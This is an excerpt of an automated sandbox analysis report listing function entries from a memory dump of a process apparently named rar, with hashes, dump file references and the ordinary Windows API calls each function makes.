                                                                                                                                                                                                                              • Opcode ID: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
                                                                                                                                                                                                                              • Instruction ID: 401c196ee56c934f0598c0c3e6199775cb61109fdb35e91719d26f966ac385ae
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 30018639A99A9151EA648F29F5045696271BF58BA0F149730DB6D87BE4CF3CE8418700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • setbuf.LIBCMT ref: 00007FF6BBCC7A7B
                                                                                                                                                                                                                                • Part of subcall function 00007FF6BBD12AE4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BBD17EF3
                                                                                                                                                                                                                              • setbuf.LIBCMT ref: 00007FF6BBCC7A8F
                                                                                                                                                                                                                                • Part of subcall function 00007FF6BBCC7B44: GetStdHandle.KERNEL32(?,?,?,00007FF6BBCC7A9E), ref: 00007FF6BBCC7B4A
                                                                                                                                                                                                                                • Part of subcall function 00007FF6BBCC7B44: GetFileType.KERNELBASE(?,?,?,00007FF6BBCC7A9E), ref: 00007FF6BBCC7B56
                                                                                                                                                                                                                                • Part of subcall function 00007FF6BBCC7B44: GetConsoleMode.KERNEL32(?,?,?,00007FF6BBCC7A9E), ref: 00007FF6BBCC7B69
                                                                                                                                                                                                                                • Part of subcall function 00007FF6BBD12ABC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BBD12AD0
                                                                                                                                                                                                                                • Part of subcall function 00007FF6BBD12B40: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BBD12C1C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo$setbuf$ConsoleFileHandleModeType
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4044681568-0
                                                                                                                                                                                                                              • Opcode ID: 4e01616fa307debef67f3bdae5e4254b32b96fa30cb3d95000aeda74735f0c5a
                                                                                                                                                                                                                              • Instruction ID: 98a5b58f43544f4a52c003200e2de22435dfabc90058202cc9f8e8fbc416e321
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4e01616fa307debef67f3bdae5e4254b32b96fa30cb3d95000aeda74735f0c5a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D6010000F1D69205FA1CB37D54663B55452AF99310F584379E72D863F3CE5D64128395
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2976181284-0
                                                                                                                                                                                                                              • Opcode ID: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
                                                                                                                                                                                                                              • Instruction ID: d7993bbb6d00f7fc5c2760a371d5f02710446fd472af929730a4d774644ada9b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BE017C22A48A8292EB68DF2DE4482692260FB48778F144331E73D891F5CF6CD586C740
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(00000800,00007FF6BBCD305D,?,?,?,?,?,?,?,?,00007FF6BBCE4126,?,?,?,?,00000800), ref: 00007FF6BBCD30F0
                                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF6BBCE4126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF6BBCD3119
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                                                                              • Opcode ID: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
                                                                                                                                                                                                                              • Instruction ID: f1dbf7347f89a6f7fb5bfc63d8fcfd0c08688575930f6673746d0db0660150c1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 90F04F25B18AC145EA64DB29F4593A963A0BB8C7D4F800631EB9CC37AADF6CD5848B00
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DirectoryLibraryLoadSystem
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1175261203-0
                                                                                                                                                                                                                              • Opcode ID: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
                                                                                                                                                                                                                              • Instruction ID: 72b6066ea8370721c9ac9b3aec2fade9e7531b0a2bd3c74812b27ed2296d4200
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 24F03621B289C186F674DB24E8193FA6364BF9C784F804531EACDC26B9DF2CD244CB50
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$AffinityCurrentMask
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1231390398-0
                                                                                                                                                                                                                              • Opcode ID: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
                                                                                                                                                                                                                              • Instruction ID: fd19eaaee1fe523d92d28f50f1c7705f1d0c7183f108302fa47fc1af008726ab
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 43E09B61B3459146DBDD9B1DD495FAD13A0BF58B80F806035F50BC3E64DE1DD5488B00
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 485612231-0
                                                                                                                                                                                                                              • Opcode ID: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
                                                                                                                                                                                                                              • Instruction ID: 3b352b58d888d44c18bd0aed62541d11ea81368dfcef7a97ab5f791d227a3f23
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 34E0EC61F1A55346FF5CABFBA8151741291BF8CB44F188A34DB1DC6372EE2CA4418E48
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: b1f78030b105e8ef79cd3893a111a15daa0c47b9b3a9a9d6e170b652ba698f98
                                                                                                                                                                                                                              • Instruction ID: 176c8c6301cc22cfb6f1a100596b3e382966391b07cf908edf8742990cd207b1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1f78030b105e8ef79cd3893a111a15daa0c47b9b3a9a9d6e170b652ba698f98
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 08E1D221A0868291FF21CB2C94582BE6771FF49B88F6441B6DF4D8B7E6DF2DA449C710
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 41fee4be509a7d6b9010376eb7811afad9251bec75b598907398f09de2282cd6
                                                                                                                                                                                                                              • Instruction ID: 7097bf5ecebfaf235a0ad12f157cc8e7189c3771c4c03baaf156b16ec66b8987
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 41fee4be509a7d6b9010376eb7811afad9251bec75b598907398f09de2282cd6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D1511673528BD295E701DF28A8452ED37A8F744F98F58423ADB884B7AADF385051C325
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3947729631-0
                                                                                                                                                                                                                              • Opcode ID: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
                                                                                                                                                                                                                              • Instruction ID: ffbd0ba86c1cc6377009d26b621d815302b419d8c39b0782e202c8d9ab6ee73c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5641A021B19A6386FB6C9B5CD45017862A1FF98B40F084639DB0DD76B1DE3EE8458740
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CommandLine
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3253501508-0
                                                                                                                                                                                                                              • Opcode ID: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
                                                                                                                                                                                                                              • Instruction ID: e509977f828cb6c65651a5b06cb0c55516180ef2fc1b435fb84da03fa32ae12e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 88016D12A0CA4285FA54FB1AA4143BD56B0BFADB94F488435EF4D8737ADF3DD4818384
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                              • Opcode ID: ca30e85b47fa1e18d3f1659bb3f59f1703126fc617b20a809fafb72b1d5571b6
                                                                                                                                                                                                                              • Instruction ID: 76cbff97918cea57660d9dfd4724f226aafcf5c036d5b27384607cdc3ec5af9d
